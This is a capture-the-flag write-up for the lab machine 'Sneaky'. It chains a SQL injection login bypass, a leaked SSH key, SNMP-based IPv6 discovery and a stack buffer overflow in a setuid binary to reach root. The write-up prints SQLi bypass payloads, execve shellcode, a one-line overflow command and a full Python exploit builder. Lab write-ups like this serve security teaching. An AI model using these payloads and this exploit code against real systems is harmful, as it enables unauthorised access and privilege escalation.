# Sneaky

## Sneaky - 10.10.10.20

### Target Enumeration:

IP: 10.10.10.20

User: 9fe14f76222db23a770f20136751bdab

Root: See screenshot

### Ports / Services / Software Versions Running

80/tcp open  http Apache httpd 2.4.7 ((Ubuntu))

161/udp open  snmp SNMPv1 server; net-snmp SNMPv3 server (public)

### Vulnerability Exploited:

SQL injection authentication bypass on the /dev login page.

The user's SSH private key is stored on the web server.

### Privilege Escalation:

/usr/local/bin/chal is vulnerable to a stack-based buffer overflow (the saved return address can be overwritten from its argument), which yields a root shell.

### Exploiting the host:

Nmap:

![](https://lh6.googleusercontent.com/i8qPkOI8tRyXiCH8SEBrcmGlEAm9jGchK1S8PKRKDkRaHBSyHkvhKcEyAz69C4odFsLY_VUb6v74j75t1KQ9aRlq4UhyTvlGvqNQmuC_VB2kdyibOL3kqAty9yGKocHnP9BXIvl1)

Dirb:

<div align="left"><img src="https://lh4.googleusercontent.com/AJqex9vaoOyFd-_4nbKW7MiYhkSi-KC0VWyqYPfjSaISAfemLuXLIvn_he1Tm6JcA2n4AEiAgRM3wanowvxSsGQB3cVseXRu5KphY2bwQ8QWKWSm18u_C0x9BOHhouCDaAsEaGHc" alt=""></div>

/dev is a login page

<div align="left"><img src="https://lh4.googleusercontent.com/HFw7YSRkTm3CipYmmWSkD5uLLO2H6wwDspY3PbTcCJvy7mUqIJKe5SYfDQPAbn8VzB6_CZyzn-HLoxDXSXVThRawvX2lWheAVZ_cZPgHO-cD5L5-zWg0v4dKCzdTN3DxFrrh5Bt8" alt=""></div>

Intercept the login request and fuzz the parameters for SQL injection with Burp Intruder:

![](https://lh3.googleusercontent.com/_sMikqLi8oCm7x1XRoTLFEFU52b0yHAA8mBUznRZ2YwNE6EE2h3UZAvtyDyzNQo_JwTPHGC7YdkNhDeKjrccKPaFnR_tqDU3_rpv0m1C1W5HngGJ9w3GS24haE28lYXtmvvinYor)

The login can be bypassed with an SQLi payload:

<div align="left"><img src="https://lh3.googleusercontent.com/fgfdqlSaNwWyGjEWK_TvWVywTlh0v6qv5bexDxpxnRxhLLYy7Tb_X37EK8qQqtHq8j3QCec6abSrKn3zQ5SPg8oto-zM8_pjuKIHpibsWtS5IsRNN_Ka0vHtzIHe78r2ER_G25JH" alt=""></div>
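The exact payload used is in the screenshot above. As an added illustration of the mechanism (this is not the box's application code, whose schema is not on the page), here is a throwaway SQLite login check in its injectable form next to its parameterised fix, run against a constructed `users` table:

```python
import sqlite3


def make_db():
    # Constructed sample data: a stand-in for the /dev login backend.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE users (name TEXT, password TEXT)")
    db.execute("INSERT INTO users VALUES ('admin', 'not-on-the-page')")
    db.commit()
    return db


def login_vulnerable(db, name, password):
    # String-built query: attacker input is parsed as SQL syntax.
    q = "SELECT name FROM users WHERE name = '%s' AND password = '%s'" % (name, password)
    row = db.execute(q).fetchone()
    return row[0] if row else None


def login_fixed(db, name, password):
    # Parameterised query: input is bound as data and never reaches the parser.
    # (Password hashing is omitted; the point here is query construction.)
    q = "SELECT name FROM users WHERE name = ? AND password = ?"
    row = db.execute(q, (name, password)).fetchone()
    return row[0] if row else None


def demo():
    """Run two classic bypass payloads against both versions."""
    db = make_db()
    comment_out = "admin' -- "   # closes the string, comments out the password check
    always_true = "' OR 1=1 -- "  # empty name OR a true predicate, rest commented out
    return {
        "vuln_comment": login_vulnerable(db, comment_out, "wrong"),
        "vuln_or": login_vulnerable(db, always_true, "wrong"),
        "vuln_honest": login_vulnerable(db, "admin", "wrong"),
        "fixed_comment": login_fixed(db, comment_out, "wrong"),
        "fixed_or": login_fixed(db, always_true, "wrong"),
        "fixed_honest": login_fixed(db, "admin", "not-on-the-page"),
    }


if __name__ == "__main__":
    for k, v in demo().items():
        print(k, "->", v)
```

Both payloads return the first row (`admin`) from the string-built query without knowing any password, while the parameterised version only succeeds with the real credentials.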

Request the page in the browser and download the key:

<div align="left"><img src="https://lh5.googleusercontent.com/713Ce8xaK_V__xrlpivTO_Tuj-z0_YjsMbuwmDK2FM4WicqNTva2dlKnzl0l6T1iUZu0fRBvD35jYwFkCKFY9Mi6yUUlbV5cuIcUhTRzY5jNHEKVtFWpku0zc4pJnP3kkEiRBiSv" alt=""></div>

Key contents

<div align="left"><img src="https://lh4.googleusercontent.com/VG_612Ol081hzE0ANMs4wa8DqBQ63d8f8lhpGLJ1qbWRb_OWS7tPO1nkDts_sHUyyWbgMoMNl-hTosruuhlKN5ZsAMd_V2y1zrGElZdYYeJHFHa0CBDVzOwxf-1VTOnHDZVVH2BL" alt=""></div>

SSH is not listening on the IPv4 address, so we need to find the host's IPv6 address.

Check our own IPv6 address first, since the target's global address uses the same prefix.

snmpwalk with the `public` community string gives a lot of information:

![](https://lh4.googleusercontent.com/nCKdkk9-zNmw01y4dm-gAyQZhPn1O1phhpvTexZ4jpfDK7rrUTE-yCkgjsqAZ6p-wM-ReU3QdBbNfvnM6ZM6vBlj29ll8LlsH1gIDaDKjStdluqgdqr_nqPlqe8dhJDPp8wnz2Tn)

Find the IPv6 entries in the ipAddressTable (OID 1.3.6.1.2.1.4.34):

![](https://lh4.googleusercontent.com/sXfNg4BeIxnm8soaP1z1MZg_pTmWwJBvTRQ6zyfYWAYYDKGUW9KEAa3MqPakRJdbOO4rLFzuifwJrQ5t9nvCkA6dNhbENPIXsNHzqBt8Eyd5FukG9ZQXF9yDmpqfR14BGYA8v8hB)

The OID suffix encodes the address as decimal octets, prefixed by the address type (2 = IPv6) and its length (16):

iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248

Convert each octet from decimal to hex with Python:

<div align="left"><img src="https://lh4.googleusercontent.com/XQPtbvf8roejk8vFw3D-U-0q6Vcb_3kCR90o_yvJlTp6-VLRDHww_1UxS8I1-vA-aR9sOHySK8ytx1FoblrsQ7dfNlxqojrrZWnFGv78s1yX26U-YwYQAUL7C6imgyyi3USaF9YV" alt=""></div>

That gives the link-local address fe80::250:56ff:feb2:8ef8 (254.128 = fe80). A link-local address is only reachable from the same network segment, so keep the interface identifier (250:56ff:feb2:8ef8) and substitute the routable dead:beef:: prefix the lab network uses:

`dead:beef::250:56ff:feb2:8ef8`
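As an added example (my code, not the writeup's), the same conversion done by decoding the whole table index instead of hand-converting octets: it parses any ipAddressTable OID from snmpwalk output (IPv4 or IPv6) into an `ipaddress` object, recovers the MAC from the modified EUI-64 interface identifier (the `ff:fe` in the middle is the sign that the identifier is derived from the MAC, which is why it can be reused under another prefix), and substitutes a prefix. The IPv6 OID is the one on this page; the IPv4 OID is constructed for illustration and the `dead:beef::/64` prefix is the writeup's assumption, passed in as an input.

```python
import ipaddress

# The ipAddressIfIndex OID copied from the snmpwalk output on this page.
OID = "iso.3.6.1.2.1.4.34.1.3.2.16.254.128.0.0.0.0.0.0.2.80.86.255.254.178.142.248"

# 1.3.6.1.2.1.4.34.1 = IP-MIB::ipAddressEntry; columns follow, then the index.
IP_ADDRESS_ENTRY = [1, 3, 6, 1, 2, 1, 4, 34, 1]


def parse_ipaddress_oid(oid):
    """Decode an ipAddressTable OID into an IPv4Address or IPv6Address.

    The index after the column id is InetAddressType (1 = ipv4, 2 = ipv6)
    followed by the address as a length-prefixed OCTET STRING in decimal.
    """
    parts = [p for p in oid.replace("iso", "1").split(".") if p]
    nums = [int(p) for p in parts]
    n = len(IP_ADDRESS_ENTRY)
    if nums[:n] != IP_ADDRESS_ENTRY:
        raise ValueError("not an ipAddressTable OID")
    # nums[n] is the column (3 = ipAddressIfIndex); the index starts after it.
    addr_type, length = nums[n + 1], nums[n + 2]
    octets = bytes(nums[n + 3:n + 3 + length])
    if len(octets) != length:
        raise ValueError("truncated address in OID")
    if addr_type == 1 and length == 4:
        return ipaddress.IPv4Address(octets)
    if addr_type == 2 and length == 16:
        return ipaddress.IPv6Address(octets)
    raise ValueError("unsupported InetAddressType %d / length %d" % (addr_type, length))


def eui64_to_mac(addr):
    """Recover the MAC from a modified EUI-64 interface identifier, or None."""
    iid = int(addr).to_bytes(16, "big")[8:]
    if iid[3:5] != b"\xff\xfe":
        return None  # privacy or static identifier: not MAC-derived
    mac = bytes([iid[0] ^ 0x02]) + iid[1:3] + iid[5:]  # undo the U/L bit flip
    return ":".join("%02x" % b for b in mac)


def with_prefix(addr, prefix):
    """Keep the low 64 bits (interface identifier), swap in another /64 prefix."""
    net = ipaddress.IPv6Network(prefix, strict=False)
    iid = int(addr) & ((1 << 64) - 1)
    return ipaddress.IPv6Address(int(net.network_address) | iid)


if __name__ == "__main__":
    link_local = parse_ipaddress_oid(OID)
    print("link-local:", link_local)
    print("mac:", eui64_to_mac(link_local))
    print("global guess:", with_prefix(link_local, "dead:beef::/64"))
```

The recovered MAC starts with 00:50:56, a VMware OUI, which matches a lab VM and supports the assumption that the identifier is MAC-derived rather than a privacy address.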

Log in over IPv6 with the username and key recovered from the web server: `ssh -6 -i <key> <user>@dead:beef::250:56ff:feb2:8ef8`

![](https://lh5.googleusercontent.com/V39NTS1tgMyOMiEYJhG3cma8lKBYoDGhIRYd-a0brXy36b2oZ3LN7hpUO7D1IgkgidFVN_Ax_KgKDnxGLznKNr83KzpB2IjyeAkBRTxgTUy9kpwFT6PLe13HqPOn_hg9QIWrzizl)

Search for privilege escalation vectors:

![](https://lh4.googleusercontent.com/CtzkIEBmtSiRxQV9lqHnSO0lsyrcIyh8wEuifE4DvIcG575rjof9wq8BRK-sbkWrfyjtswg4RDVPWsXLb4qLU5V7-E2ocaHDWnAxEh2nOP63xhEo9CQ18ilcatJJrwAmO1Ao_iMw)

Running the binary with a long argument shows it is likely vulnerable to a buffer overflow:

<div align="left"><img src="https://lh4.googleusercontent.com/lAw3ZnKCYcqMT7q3tdnfDTWxUlLYK_hMi3EOZXURdNZKynhGvja5uKhRD46_UxWpxonBEUNx-wWWt4j_qBS6MHL8XO5I3ZbhLs2g3xA5Tz0Av4hIkmneTlTZnPWP_77BrJARebh_" alt=""></div>

Check that the saved return address (EIP) can be overwritten:

![](https://lh4.googleusercontent.com/0aFs6eDsC4wKWxrzSA_ih6Oj9joM_zktkGO4sF12o9h0TwWX5pVLQTDR7pv_kkJ0Sm43SOfFvveKjBRRWTaKL_-3Vj-eYSYAIfXPSLa1pexZHMvpV8e8oAYgPstlQuOq7-B1c2iN)

Generate a pattern to locate offset

![](https://lh3.googleusercontent.com/IR4QPZYwpLc_AyAqaGzDFb-0Kzj2kdHtPaS-iCPGw6Nni09zGBaAWHe0-R9h5RHgdb5-c1gciuIJRbsPTprCOgfO9Gn8aVinRJhsnRESON8ysdFb6CPEGmXbCJLjDzopEZ5KAg2x)

Pass the pattern to the program as its argument:

<div align="left"><img src="https://lh4.googleusercontent.com/0O-O9xkfFbBcevvDITQJFAL9LybvqGiHQ4cDYCbsHOB2MI7l-Sc1Gevxs7-iAz0HuiWyYUdKMtLIqNKVMfUjbGusprLtJY1A40yRHu-_a55anJvwwsBNBU3IBZJfs3HjtcDdg_y6" alt=""></div>

Look up the crashed EIP value in the pattern:

![](https://lh3.googleusercontent.com/5jijNmo8LZ73XXhlMl7Nywf2-z-P1QcXHAEucQgfkJ77fPtsoIgL1FdC1bkYbIq6V1mpJEKSNc_Z1F8FzH8eOkCexBcyfXv7Q6Gn1xkmJfTqciLZF-D8dYWWnrQOIdVGMH_zfZCb)

The offset is 362 bytes:

![](https://lh6.googleusercontent.com/7op9KCgUaXkjaORWM8pHpP3OPH508SUZyeC1B4tr_lxx7FG5Y9GOeBUNnEuklV1NLE4SDMHXKuafKmkb1vUTQG1I7b5vqpBB8jBiqfC0XkwQyqmVvwny3NJQjOeu5mEpOe45Oe2s)

Build the overflow using an execve("/bin//sh") shellcode (23 bytes, no NUL bytes):

```
"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
```

The stack address seen in gdb differs from a normal run (environment and argument sizes shift the stack), so expect to try several return addresses before the jump lands in the NOP sled.

Open gdb and find a stack address inside the buffer:

```
(gdb) run AAAAAAAAAAAAAAAAAA-SNIP-AAAAAAA
```

![](https://lh3.googleusercontent.com/Erz_6cbXeqbdU6VVKDaB8RzEm5tpVQ7dVI1h5RUxXGPnjvjtPY5tgt78IRRznvp0BR3JmBlgizkN2-kPUIOA_Egd1vjmv3r0pbDgJ2QphvpUvInEg7aeloxNbpSHAgTE3ukqKOsM)

Write the address from gdb in little-endian byte order (0xbffff4be becomes `\xbe\xf4\xff\xbf`).

Build the payload as padding up to the offset, the return address, a 100-byte NOP sled and the shellcode. This is Python 2 syntax for the target's `python`; this variant of the shellcode zeroes ecx/edx and appends an exit syscall:

```
/usr/local/bin/chal $(python -c 'print "A"*362+"\xbe\xf4\xff\xbf"+"\x90"*100+"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x89\xc1\x89\xc2\xb0\x0b\xcd\x80\x31\xc0\x40\xcd\x80"')
```

![](https://lh4.googleusercontent.com/-f7K2wlXknEa5ePcu4milvEZ0-vFzNTsloWhNJInqJgcevTHIBw6D5E00WKv-oa2wT0JAaXqpSZP9DKipqOOLn0-P4tua4CyNWHNuNb9gDJMRgt0Yyrm8327AW7AApXddfq7lBSE)
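As an added example (my script, not from the original writeup), the pattern, offset and payload steps above combined into one Python 3 tool: it generates the Metasploit-style cyclic pattern, recovers the offset from a crashed EIP value, and assembles the final buffer with `struct.pack` for the little-endian address, refusing any payload that contains a NUL byte (a C string copy would truncate it). The offset (362), return address (0xbffff4be) and shellcode are the values from this page; the return address is environment-specific and must be re-read from gdb for each run. The EIP value 0x316d4130 in the `main` block is what this pattern produces at offset 362, computed here, not a value from the page.

```python
import struct
import sys

OFFSET = 362            # bytes before the saved EIP, from the pattern lookup
RET_ADDR = 0xbffff4be   # stack address from gdb; re-read this, it moves
NOP_SLED = 100
# execve("/bin//sh") shellcode, 23 bytes, NUL-free.
SHELLCODE = (
    b"\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e"
    b"\x89\xe3\x50\x53\x89\xe1\xb0\x0b\xcd\x80"
)


def cyclic_pattern(length):
    """Aa0Aa1...Ab0...: every 4-byte window is unique, up to 20280 bytes."""
    out = bytearray()
    for upper in b"ABCDEFGHIJKLMNOPQRSTUVWXYZ":
        for lower in b"abcdefghijklmnopqrstuvwxyz":
            for digit in b"0123456789":
                out += bytes((upper, lower, digit))
                if len(out) >= length:
                    return bytes(out[:length])
    return bytes(out[:length])


def pattern_offset(value, length=20280):
    """Offset of a crashed EIP value (int as gdb prints it, or raw 4 bytes).

    gdb shows EIP as a number; the bytes that landed in memory are that
    number in little-endian order, so repack before searching.
    """
    if isinstance(value, int):
        value = struct.pack("<I", value)
    return cyclic_pattern(length).find(value)


def build_payload(offset=OFFSET, ret_addr=RET_ADDR, nops=NOP_SLED, shellcode=SHELLCODE):
    """padding | saved-EIP overwrite (little-endian) | NOP sled | shellcode.

    The return address must land anywhere inside the sled, which sits just
    above the overwritten EIP on the stack; the sled slides into the shellcode.
    """
    payload = b"A" * offset + struct.pack("<I", ret_addr) + b"\x90" * nops + shellcode
    if b"\x00" in payload:
        raise ValueError("payload contains a NUL byte; it would be truncated")
    return payload


if __name__ == "__main__":
    if len(sys.argv) == 2 and sys.argv[1] == "pattern":
        sys.stdout.buffer.write(cyclic_pattern(500))      # crash input
    elif len(sys.argv) == 3 and sys.argv[1] == "offset":
        print(pattern_offset(int(sys.argv[2], 16)))       # e.g. offset 316d4130
    else:
        sys.stdout.buffer.write(build_payload())          # exploit buffer
```

Usage: `python3 exploit.py pattern > pat.bin` and run the target with `"$(cat pat.bin)"` to get the crash, `python3 exploit.py offset <EIP>` to read the offset (it prints 362 for 316d4130), then `python3 exploit.py > payload.bin` and `/usr/local/bin/chal "$(cat payload.bin)"`. Passing the buffer through `argv` is why the NUL check matters: a shell cannot put a NUL byte into an argument at all, and the target's own copy would stop at one.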

Now you have a root shell so collect the flags

<div align="left"><img src="https://lh3.googleusercontent.com/jyltSt5nFD9jUnVM5PaoXlGvhhqMElcfif2fuoVv2NxOKlPGy9PAcuHtpHlMgYRGHtHPotGvdb7wbZrGqstlfHpAsgArzM-ujgSEwGd3Np8vLl9yolEuCR4ytEe3w-eoo_XCe5dt" alt=""></div>
